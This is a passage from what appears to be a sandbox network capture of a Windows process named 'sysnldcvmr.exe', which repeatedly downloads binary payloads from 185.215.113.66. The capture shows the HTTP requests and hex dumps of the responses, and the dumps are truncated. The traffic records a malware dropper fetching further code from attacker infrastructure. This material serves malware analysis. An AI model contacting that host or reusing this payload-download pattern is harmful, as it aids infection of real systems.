Dec 5, 2024 17:34:15.524451017 CET	248	IN	Data Raw: 10 68 68 88 46 46 6a 78 92 f2 b3 b1 36 e2 3e 60 62 7a b3 1b 8f dd 2b 47 f6 62 06 5f f8 6b dd 8a e1 9d 1a 3a 94 1f 1d ec 45 e3 a2 65 57 a4 05 98 f3 53 49 46 b8 0a 9c 2b d0 1c f8 6e ae b5 e5 cd f6 38 6c 2d 22 6b 9c 11 7a a2 2e d5 54 6f 28 f2 29 3e Data Ascii: hhFFjx6>`bz+Gb_k:EeWSIF+n8l-"kz.To()>H<#DIj$W:J/eU\epgWKc@erY7>(f5a@`/2Bv(M}J^!P8XG+oP,8Jp$U%-I<
Dec 5, 2024 17:34:15.525619984 CET	1236	IN	Data Raw: 01 5e 1e 42 70 f5 61 73 f1 0c 3e fb ed 02 70 e3 f2 8d 7f 63 08 8e 11 34 36 48 68 74 e5 6c fd 21 7b e7 09 bc e5 e6 a4 c2 a6 e9 8a f5 1b 49 0f dc cc 82 ee 89 3a db 91 dc 48 5d c4 98 b8 0a ed b8 9b 4c 28 09 ce cd 2b 86 8b 9d 2d 80 57 c4 60 4b 06 a6 Data Ascii: ^Bpas>pc46Hhtl!{I:H]L(+-W`KkE_P@%))"=$%<b80{`\3@<U/t-%"[-7(*q.S.e\|a_iB>9m2Q\|cjC,uMQ&ez; >}V`?`0
Dec 5, 2024 17:34:15.525677919 CET	1236	IN	Data Raw: 15 9d fe f4 07 05 d4 1f f0 a0 6c d7 0d 39 91 a5 49 3c 8c eb 10 ca 4d 06 b0 60 1b 8d 58 c7 ab 92 c7 6b 55 73 52 ea 55 db d8 37 96 94 06 5a f4 de d8 41 92 1d 88 57 80 f0 71 ad ce 92 66 d8 88 f2 98 f1 66 20 d4 ab ff c3 3c af a6 a0 83 3e b2 ed b3 a0 Data Ascii: l9I<M`XkUsRU7ZAWqff <>j+Sh.Psl)cbF{q<Cj?=~,6,$yZ_74QuGS_C\|Pn-b'npNv:A+[97]Lg!7[,m["*?{\|(\|v
Dec 5, 2024 17:34:15.525688887 CET	248	IN	Data Raw: 08 27 45 cd 18 52 40 e6 c0 c5 d7 9c b3 55 03 87 49 31 c8 3e f3 3c a4 ce 21 1d b9 07 76 a5 4d fa 01 d5 59 74 0e 97 25 b1 17 6a ae 4d 8d a3 26 b7 54 27 30 df 79 e7 77 51 ef 0e e9 db db 06 62 c7 b9 15 b1 b4 6a 0c a6 e2 c5 1e 41 70 6d 8c 37 64 c6 eb Data Ascii: 'ER@UI1><!vMYt%jM&T'0ywQbjApm7d`YA8dFIy{7{,wdFQg7TRorwfw`[q/LC]CmBqbWvI}DNAW[f*cSqZ_hMt1JA:
Dec 5, 2024 17:34:15.527177095 CET	1236	IN	Data Raw: c3 40 7a 9b 27 88 a7 3d f3 4f 76 4f 9d 81 2a b8 bb 78 1e 60 55 87 2d 9c f4 43 a7 94 ea a1 c2 c9 2f b8 1a 96 e8 d8 3d 74 c2 4d 2c e7 ed 9f 87 5a 87 18 a2 55 92 88 6d 32 bc 9e ca 3d fc 86 bc 95 a6 19 f7 67 2c bc a2 27 0b 4e da 6e 9e 27 b8 1d 15 29 Data Ascii: @z'=OvO*x`U-C/=tM,ZUm2=g,'Nn')/C]jmO2qPy,v5yQiQl[x;l@>ULb@7pi.Rxju}Kw(\|JC79dh<>}+4mXHBhQ%
Dec 5, 2024 17:34:15.527275085 CET	1236	IN	Data Raw: 54 04 7d 2a c5 e8 7a 84 17 11 2f 10 d3 cc a0 28 56 de b0 1d 7f e5 62 6e 42 76 ba fa 46 3e c1 2e 67 c3 68 cb 43 43 dc 04 be e4 87 e3 86 cd bd 5c c0 ef 84 63 ee 86 09 76 95 ee 98 48 cd 8c 37 bd fc 9e 5b 38 2d 26 09 9e 8d 78 09 76 22 65 39 fd 91 cb Data Ascii: T}*z/(VbnBvF>.ghCC\cvH7[8-&xv"e9c2M7\|t5s<VUnMi.~_'L@"(?rTb2Ha1&w<+nlm4\h>6?lP~'3O\|DHHojCa->'XcEgPf
Dec 5, 2024 17:34:15.641702890 CET	248	IN	Data Raw: e9 c3 ae 8e 6a d3 fc a6 86 82 41 8a fc 7e 31 e7 3c 59 3d 6a f3 b0 5d 45 4a 20 05 88 25 a9 6c a6 3e 02 3f 36 e5 aa 27 5e 1e 60 ea aa 20 34 96 cf 5b a1 27 b2 53 54 c3 14 79 01 c2 90 6f 30 32 3f 9e 49 33 5c 7b 23 41 b9 9a 64 6a 3b af 26 be 56 e8 63 Data Ascii: jA~1<Y=j]EJ %l>?6'^` 4['STyo02?I3\{#Adj;&Vcrt^DiTWrG3qw}CG?aDSWl)mG[evIxBZQWW0pvuf~Q[UZk";g6wjI'i[+`0.q:I$Dy_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.11	50045	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:34:18.046305895 CET	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:34:19.357336998 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:34:19 GMT Content-Type: application/octet-stream Content-Length: 10496 Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT Connection: keep-alive ETag: "67154d18-2900" Accept-Ranges: bytes Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED] Data Ascii: \|@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\\|wBvugOX% hr9:\|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c\|gL0)cM]oL{:En:?\|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
Dec 5, 2024 17:34:19.357352018 CET	124	IN	Data Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96 Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>
Dec 5, 2024 17:34:19.357800961 CET	1236	IN	Data Raw: 2a a9 81 d6 fd 42 20 61 77 b3 e1 96 27 26 69 a5 a5 fd 12 45 e7 70 8e 52 61 02 17 bc a9 fa 4d a1 ea eb 5a fb ad a9 7c e3 d6 09 c7 bf 33 87 46 cc 6b 3c ed 6c d3 51 3b fe c7 be d3 12 b7 d8 47 62 86 b4 a5 12 50 1b 06 4d 8c ed 6c 18 68 d3 b2 17 e9 35 Data Ascii: *B aw'&iEpRaMZ\|3Fk<lQ;GbPMlh5}8m;ajW,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7\|VbF9?gk{is6u_pi!
Dec 5, 2024 17:34:19.357846022 CET	1236	IN	Data Raw: 4b dc 75 22 a9 31 18 da 58 da 9c 5b 38 49 62 0f b2 64 bd f8 00 b5 79 6d 2d 2a c5 7c 0a c5 a7 e9 1e a3 fd 06 2b 0f de a6 3e 61 08 18 aa 60 84 ce 3c fb 5a cc 21 25 12 f9 d9 17 a6 7c 20 a2 34 26 b5 80 dc bc 1c fc 99 e4 5b 2b d1 75 73 4c 5e a1 c3 65 Data Ascii: Ku"1X[8Ibdym-*\|+>a`<Z!%\| 4&[+usL^etpuu);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E98k-
Dec 5, 2024 17:34:19.357856989 CET	248	IN	Data Raw: 0b 3e 1f 18 b4 22 57 d9 8b 7c 31 98 16 87 ae e9 52 72 6d 5d c2 16 1d 54 31 c6 26 50 53 c5 b3 54 51 99 ab e5 bf ce ab 5a 8a 71 45 74 67 a4 63 0c 5b 55 2a 2c 09 40 f8 fc e9 05 9a 85 93 2b 1f c2 e7 ee b8 e5 f1 4c c2 16 6f c2 52 95 cb 30 72 4d 77 66 Data Ascii: >"W\|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh['3(@
Dec 5, 2024 17:34:19.358494043 CET	1236	IN	Data Raw: b3 98 60 7b c2 fe 18 6e 6c 3b f9 ac a2 de d3 91 55 a0 66 42 35 cf 21 d2 35 e4 39 75 47 bc 4a 30 fd b3 ec 68 e2 05 c4 c5 0d b9 52 96 f9 ee 21 eb 75 28 d5 c0 2a 64 ef c0 3a ab 95 53 65 fa 72 6b 02 d9 89 0d 29 a1 42 a0 92 05 af 99 89 64 03 c4 b2 ec Data Ascii: `{nl;UfB5!59uGJ0hR!u(d:Serk)BdWmlE)Mt9G2?=L{Pq CT dsHHw+~1uDu,;xuv&eaAwm])pQ`Hvn
Dec 5, 2024 17:34:19.358539104 CET	1236	IN	Data Raw: 5d d4 ae 87 4b 4c 5c f5 f8 b1 42 1c 64 40 21 dd a9 b2 1b 90 9c 81 19 71 86 63 c3 42 58 66 10 97 16 6b 3d 84 2a 17 7d 6e 66 0d 82 1c 4b 89 f7 0c b4 fc 57 4c fe e5 46 ad 79 7f 9e 36 a4 b2 71 69 ed a1 f5 ad 6a 09 6a c9 cc 71 82 36 aa fa 62 12 93 06 Data Ascii: ]KL\Bd@!qcBXfk=}nfKWLFy6qijjq6b&?:2c4]&`iDl=z4EdgAD7&iM:_GHkdUDfMvJ_;Pk9njT:S;7#B0;s9MxF!o-0.Iq&
Dec 5, 2024 17:34:19.358551025 CET	1236	IN	Data Raw: 15 0a b1 41 8b 4d 2d 18 0d 2f 21 95 f5 2c 5d 7f 02 b3 e1 61 f1 81 14 90 ff a6 59 49 c6 b6 95 e1 52 b6 70 e5 9f b1 d7 6f 16 6f 39 ca 52 7f 6a 8d eb 57 0c 60 75 2d b8 22 aa d4 b9 c2 57 7d 76 34 64 44 38 78 a0 68 d0 a0 44 9b 74 71 55 fa f6 a6 80 b6 Data Ascii: AM-/!,]aYIRpoo9RjW`u-"W}v4dD8xhDtqUl/2:O!iKv^l1=>rJ!;=wJo OhzO=q~qF.Bth]QL>uAZ Zva"HIbKd
Dec 5, 2024 17:34:19.358582020 CET	372	IN	Data Raw: a7 0b 5d 78 01 81 ca 26 1f 25 74 75 05 19 3d b0 1b 48 25 b4 f8 03 2f d1 12 7d 8c 68 7f 2b 1b 0a 77 8a 84 a5 a5 79 c6 bd 2a 28 bd 56 a5 89 c5 23 51 70 8f 67 f7 89 2b f7 49 a4 23 bf a9 72 6b 72 a1 23 b4 b9 72 4c 77 89 7b 62 45 2a e3 8d 21 bb 4e dc Data Ascii: ]x&%tu=H%/}h+wy(V#Qpg+I#rkr#rLw{bE!NlH\|3Wr:E'rhtvG.wG6n=-zPK,,jhMRD Yi=8S7=3R]TwZW9^hx``\vkU&
Dec 5, 2024 17:34:19.359149933 CET	1236	IN	Data Raw: 4d a1 d1 e7 27 05 b8 8e f4 9c 1d 95 99 e5 8c 61 b1 b2 98 8a 81 a4 59 8b c9 9a 08 ef 09 76 5f 8c fe 80 e6 77 ad 80 e9 26 d8 25 be 6b 87 19 22 2d 20 31 3f 33 75 6c a2 eb 32 ef 27 a4 4b 17 75 f1 73 04 32 85 17 e7 0f 29 03 a0 ea 5e 80 10 89 58 f6 ff Data Ascii: M'aYv_w&%k"- 1?3ul2'Kus2)^XCO"N"^E]zgh[!nlIonB1jg'\|]w<OyfG%Wl'X2c _'v^]XtCP8&S*.OU@:`#45/
Dec 5, 2024 17:34:19.478374004 CET	1236	IN	Data Raw: 6c 2b 0e 37 89 41 c1 51 1a 35 4a 27 0e 75 79 5e 19 ed a2 b8 58 ee 3d f8 ed 0a 54 b2 c3 da e0 3f a6 32 68 dd 96 90 56 1c 08 09 b7 0e 67 b7 90 96 70 6b 2c ef ea 20 91 ff ad 1b 52 5e 43 96 21 a5 a9 ad 6f b4 9f 4f f5 dc 13 8e cc f2 ed c9 2e d5 e0 5e Data Ascii: l+7AQ5J'uy^X=T?2hVgpk, R^C!oO.^;G@ ;/0#1myu)pLl!LugJ:hL"@hNUoZwAFiA;O"GaTP;\|6z:A78jGr\|OXvf~ZCen.+B];k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.11	50046	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:34:21.784591913 CET	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:34:23.229258060 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:34:22 GMT Content-Type: application/octet-stream Content-Length: 55040 Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT Connection: keep-alive ETag: "674b357a-d700" Accept-Ranges: bytes Data Raw: 71 55 bf 68 00 78 5e 05 bf 77 f1 ce 6a 84 34 af 59 54 f4 9a 7f 2e 9e 56 5c 9f 90 cf 88 27 49 60 23 c8 18 58 ef 00 f5 4c be 7d 1c 91 c4 34 02 a2 5c 3c 0d 4e 55 81 f8 05 ac ee cb 01 3b 46 d2 9c 58 e4 0f 57 22 b2 cd 6b b7 cc 33 3f be b9 da e2 c1 f2 64 fc e6 50 f4 9a 92 a5 f5 09 a8 09 a7 c7 da 31 7d 87 96 31 55 a4 1a d0 ba a1 26 ba b8 99 69 1d 33 dc 14 0f 1c 89 01 e6 63 3c 95 aa 53 61 58 04 03 e1 40 77 fb 5f 23 b2 e6 ef 48 bb 0d da b9 71 4f 5c 1b bf 2d 19 31 22 20 7c 90 25 4c a9 42 7c 7d b5 72 c6 73 d7 e6 e2 bc c8 de e2 46 c0 f0 c7 86 98 ef 5b b4 36 d4 af 0f dd d9 cf 96 3a ae 7e 9f c1 2c 54 45 11 30 e9 3e f6 a0 0c 58 a7 ed 3c 7a d4 d4 8e 7e fd 5d 2c a2 dc 17 0f 69 98 fe 29 2d 23 fc 4f a1 61 fb e3 d4 f3 0f 4b b1 33 49 91 45 9f 62 e1 a2 13 f5 5c 5d 8f c4 f6 8b c7 30 c5 0b 16 f6 6f f6 71 a2 69 a7 be c7 a0 ad 0c 22 4b 33 e3 10 dd f4 ad 9d c9 f9 ba 6b 9d 18 b7 b7 99 bf f8 3e bf 51 8f e7 79 e1 e2 02 f7 6b a1 21 e1 93 c9 31 90 95 64 be 3c 55 a3 bc b1 6e 93 47 c8 b4 34 76 3f 40 1c 6f b5 f6 6f e2 0a a6 f3 70 3f [TRUNCATED] Data Ascii: qUhx^wj4YT.V\'I`#XL}4\<NU;FXW"k3?dP1}1U&i3c<SaX@w_#HqO\-1" \|%LB\|}rsF[6:~,TE0>X<z~],i)-#OaK3IEb\]0oqi"K3k>Qyk!1d<UnG4v?@oop?t Q@>VeGy6-:p~w!:zq<\|TwX?Fq)3Pr\|\jFC4wa\|zk9eTG$IFxP!+(Wjv2G6;axnMd<?IA0![eLQ'Ju$%6b$V"2yvRKbPUH!@uQ+Zp,j%nf]k1'+\|~z0g[:e2?zO_X8IhveZ9:iOSgly{`bx6R-bHWhgF[oDzz68lty<}Du56T;,{stYZL1"!hJy^cqVNWAy<I7fo-)m/$f55KqQchAZM,v@O$j ^t)%BlCWv[ZBO8:L=-
Dec 5, 2024 17:34:23.229274988 CET	124	IN	Data Raw: 5b 45 cd 42 00 1c 84 28 01 50 de 3b 22 91 56 cf e9 a7 2b 5b f3 ba d0 65 3e d9 cc 07 bf 4f ee 6c a9 19 5b ee bb 28 49 cc e1 f2 28 87 3c e0 d7 ff a4 0a 34 6f 49 d4 2a 8b a8 f8 bc 1a 35 e9 59 59 81 c3 15 fd 6e cb be 09 bb e1 99 dc e7 12 87 9c 23 b5 Data Ascii: [EB(P;"V+[e>Ol[(I(<4oI*5YYn#XGqenlH=F<S["z{{"
Dec 5, 2024 17:34:23.346570969 CET	1236	IN	Data Raw: 6c fe cd 45 55 b9 8c 37 fb e0 65 e2 c7 a6 e8 ca 2e e7 36 11 cb 44 07 75 cb 65 86 30 68 e9 80 ff a2 f2 50 8d 9f ef f0 d7 88 1a 9c d0 44 c8 07 20 87 df eb 5f aa 42 af 74 3b f3 0f c4 18 25 80 2a b4 f7 48 e6 5f 1a db a2 ab 62 43 40 ea 39 f6 86 e6 0a Data Ascii: lEU7e.6Due0hPD _Bt;%*H_bC@97U8,/&U5Ck]ocRO3hW\|Sz#0#\|)8_wo=`w9rvM$&qfkc];j`PWbOxH2me7q-kAqD_Pk
Dec 5, 2024 17:34:23.346594095 CET	1236	IN	Data Raw: 7b 36 a6 49 ac 18 96 02 5c 26 ff 36 f8 c6 2f da 11 03 0b 43 42 d5 f1 fa 41 49 12 5f 6a f7 0d ab 9c 22 da 0e e6 73 5c a7 63 55 c5 7a be 68 9a 7b ab 24 23 8f b8 90 f1 46 3f dc 40 7f eb fc ff f9 de 79 f0 46 f0 1c bf c3 28 8f 7e 59 df 83 6b 13 f2 9e Data Ascii: {6I\&6/CBAI_j"s\cUzh{$#F?@yF(~YkV.3T#\|;d!q?+y<ptwL(>qvj?}Ip9f&)ta/kkPSHD+$"S$>p\"}q@&}X~{4SSz99)T
Dec 5, 2024 17:34:23.346602917 CET	248	IN	Data Raw: 7b c2 28 ec 12 68 73 af f0 35 fa 92 0d 6e d3 4c 18 d1 e8 8f c4 a1 15 0c 44 f9 b6 78 31 a0 fd 7f 79 99 72 c6 f0 73 47 e9 0f 40 94 99 fb e1 f0 b4 d5 8f 6d d3 2c 32 8b 19 0f 58 f0 2e 41 9c f2 6f 5b 46 89 a3 28 dc 95 c6 72 a2 e2 61 ac 48 43 c4 a9 bc Data Ascii: {(hs5nLDx1yrsG@m,2X.Ao[F(raHC&i/r"j4izzA9cLWIt_h+nLh-=-&vqSO@O<0gm:TtwnKmhmm@A>xa!@ZcI:#u
Dec 5, 2024 17:34:23.346609116 CET	1236	IN	Data Raw: 19 a0 24 4b da 1e 29 2e b8 90 9c 19 04 be a0 c4 89 13 1c 0f aa 93 20 f3 19 9e b4 84 fb e1 14 78 a7 00 52 e2 02 4c b2 23 82 28 ac f5 b8 d9 a2 cf 34 a1 59 dc ee fd 95 3e 18 9b 64 03 51 58 ab bf d0 e1 e3 e5 36 f2 4d fe 5c 19 c0 e8 22 65 10 8a 26 7e Data Ascii: $K). xRL#(4Y>dQX6M\"e&~,r7e>l=U-v"HPC\|)27gJ_nsZ'<!.xRt8HIDE1@P[lZ/\!A"7$yU?&
Dec 5, 2024 17:34:23.346621037 CET	1236	IN	Data Raw: e3 c7 0b d2 07 66 a2 02 df 9b c5 ad ab 86 33 77 7c 85 cf 8e 02 e9 ff 0a 52 b6 86 0a 21 68 f0 58 ca f5 19 d1 1f 7e eb d9 06 ec 62 12 90 c3 a8 07 cc ab 65 62 96 7c 42 a0 c7 96 0d 36 40 4f ee 7a 37 4c 55 60 da 2d 0c 43 d9 ee 18 23 31 42 c0 08 0f e1 Data Ascii: f3w\|R!hX~beb\|B6@Oz7LU`-C#1B13*8:X5PyaRb;6CXX-+X0{r7^M(:{w9Oz6k`m"q2T;auZOn.i^
Dec 5, 2024 17:34:23.346631050 CET	248	IN	Data Raw: 8b f1 53 ed 23 89 32 81 6a bd ac 31 f6 9e 1b 21 44 9f d0 ec 52 3c e7 1c f1 5f 27 92 ba 55 b5 ac 17 95 c8 e8 2a 81 72 92 e4 d3 9b 75 7a 3a 81 3a 47 c0 9d 6e d4 bb 70 d3 d3 62 2d fc c9 2d a8 43 c5 85 d8 06 4b 95 4d 8f 6a a5 64 23 d1 2f ec 3d 2b 2c Data Ascii: S#2j1!DR<_'Uruz::Gnpb--CKMjd#/=+,9D~GNR4:m{e13POt0:<E3 -zPqh_{,@K7IHJ<o:]v(-dCZ`p7(uiHd=)d3@<
Dec 5, 2024 17:34:23.346642017 CET	1236	IN	Data Raw: 17 43 81 f0 03 28 4e 24 a8 e2 3f 60 47 a1 6f 7b ec 56 d9 24 37 5a 16 c7 eb 35 dc 0e ed 65 da f8 49 f7 cc 2b 36 d8 0f 7d 66 42 a9 b8 85 ec bf 11 2a 77 a0 34 47 30 6f 7f 41 eb 96 c9 07 bc 08 47 23 99 e4 a4 6f f9 66 df 48 58 04 59 25 99 cb 97 2b f2 Data Ascii: C(N$?`Go{V$7Z5eI+6}fB*w4G0oAG#ofHXY%+CVFJq0`24NEEGWOI+3C^)^+KBSocNu\QlIj;vw(e7%3P8L97p,#0^4U[D.-Y
Dec 5, 2024 17:34:23.346647978 CET	1236	IN	Data Raw: 5a ac 51 67 01 3a 92 a1 ff f7 16 2a 46 98 21 45 9c 86 aa 78 86 b6 91 f2 e4 79 5a 79 6c ff b8 36 11 0d 46 b5 28 67 4f 17 25 c6 46 1d f0 6e a1 5f 5c 30 a3 52 df 5f d9 a2 ad 4a ff 0f 95 c9 36 8d bf 83 c5 bf c8 e5 47 08 f9 e3 09 7d 86 8c 8b 98 db 6f Data Ascii: ZQg:F!ExyZyl6F(gO%Fn_\0R_J6G}oJ&bBypG`6~!!S'?`?\i#Y%3xZT/qU^bIn/n}JGG-vam2T5a.v"[Fu#!D*
Dec 5, 2024 17:34:23.349133015 CET	1236	IN	Data Raw: 0f b3 d3 05 79 4d 7a a8 6e 58 5a 01 53 d0 02 cb c3 2b 86 63 b6 7f 83 2e eb 0d 93 a1 9d ed 03 12 e4 de 0b d4 1f da f1 2b 75 78 ac 0d d8 d3 d1 37 d3 d4 f5 3d b8 11 26 a3 c7 da 52 4d 50 d2 ae 12 55 a0 a6 f8 4b e6 c8 f4 f8 85 9b 93 57 cb 3a 31 c6 52 Data Ascii: yMznXZS+c.+ux7=&RMPUKW:1RuY[?@b DYSC^b`a85+N="p-1j'`G$hixmdkeym8)\|Sm*7Q%gDUw'P(+P{lC\q"b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.11	50048	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:34:25.774879932 CET	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:34:27.083558083 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:34:26 GMT Content-Type: application/octet-stream Content-Length: 63232 Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT Connection: keep-alive ETag: "67497f08-f700" Accept-Ranges: bytes Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED] Data Ascii: 3-;)VX\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t\|wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
Dec 5, 2024 17:34:27.083575010 CET	124	IN	Data Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d Data Ascii: 1a@ #o;R`_\|#\|H%0SH9~`aa-1gH)2sLGnc <k[63
Dec 5, 2024 17:34:27.084974051 CET	1236	IN	Data Raw: d3 d3 c0 0b 8a 7f b8 97 4e 22 4f ca 14 06 f0 a4 fe ab cc ab ac 94 22 41 1c 65 72 b1 a1 b5 80 5e 31 c0 cd f5 46 7f 2e a6 44 0d c3 f3 5b 60 96 13 5c 9d b4 83 4f f6 f0 35 44 7d 2b ea 99 13 61 4c 2e 41 60 a3 15 7d 34 29 77 78 23 0f 30 4a ae 21 f3 ba Data Ascii: N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz\|dNz=5%xuA~P{m2[Nz"Nz/`nO!\|I7XL!z?K3GB&CPXL_6<$v!afZ96*.3
Dec 5, 2024 17:34:27.085002899 CET	1236	IN	Data Raw: 2c 88 74 8b b7 76 62 a3 c9 c5 27 d0 2a 27 5c 3d 75 89 75 b6 08 e3 64 b7 af 9f 42 79 11 1c 3a 2f e8 fa 1f 02 ca 7a 20 84 ab 43 6c 66 1d 11 79 ac b5 00 76 a0 c4 46 b4 fc 34 6f d3 2b 57 54 fd 5a a7 ba 6a 03 af 6d 51 1f 49 41 51 5f 04 c7 8a c5 5b a2 Data Ascii: ,tvb''\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]rG.sM=Is$aZt&ID. MzL2V7QIu;5f;kIB*w%zH-L=_k_/i
